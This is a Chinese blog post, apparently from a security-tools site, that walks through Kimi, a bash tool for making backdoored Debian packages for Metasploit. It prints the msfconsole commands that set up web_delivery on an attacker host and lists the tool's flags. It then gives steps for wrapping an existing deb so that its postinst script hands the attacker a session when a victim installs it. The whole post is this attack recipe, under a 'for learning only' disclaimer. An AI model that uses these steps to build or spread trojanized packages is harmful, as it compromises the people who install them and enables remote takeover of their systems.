最新消息:

Linux_inject_kimi | MSF | kali linux 2017

安全工具 demon 31560浏览 0评论

声明:本文内容仅供交流学习使用,一切由使用者造成的法律问题,均由使用者自行承担!本站及作者概不负责!

简介

Kimi的名字灵感来源于动画片“火影忍者”中的“Kimimaro”。Kimi是一个由bash编写的,用于生成适用于metasploit的恶意debian软件包生成工具。其bash文件会被部署到“/usr/local/bin/”目录下。当受害者尝试安装deb包,因为postinst文件后门被执行。Bash文件注入后会执行一些系统命令,随后攻击者将会获取到一个session。

在Msf中设置 Web_Delivery:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

先来简单了解下脚本的相关使用参数:

-h, --help         查看帮助

-n NAME,  -n  后面需要跟上Deb包的名称
-l LHOST, --lhost (-l 后面需要跟上本机的IP地址)
                      LHOST, for Handler

-V VERS,  (-V 跟上随意指定版本信息以区分之前的包)

-a ARCH, --arch ARCH  Architecture (i386/amd64) (-a 需指定平台架构 如i386/amd64)

使用

简单创建一个恶意payload:

(一)首先我们需要一个Deb包,这里我使用的是之前在?http://www.ggsec.cn/Debinject.html?视频中用到过一个deb包,这里我将其重命名为f

那么-n的参数跟上f(以你包的名称为准)

(二)填上ip地址 -l 192.168.1.103

 

(三)添加平台架构-a amd64 (我是64位的所以填写amd64?)

(四)添加版本-V参数跟上随意指定版本信息以区分之前的包

生成并解压得到会话:

生成backdoor

在此期间会开启虚拟终端(xterm),以下调用MSF中的模块的方法

以下是xterm虚拟终端:

解压backdoor

得到会话

视频演示

转载请注明:即刻安全 » Linux_inject_kimi | MSF | kali linux 2017

您必须 登录 才能发表评论!



合作伙伴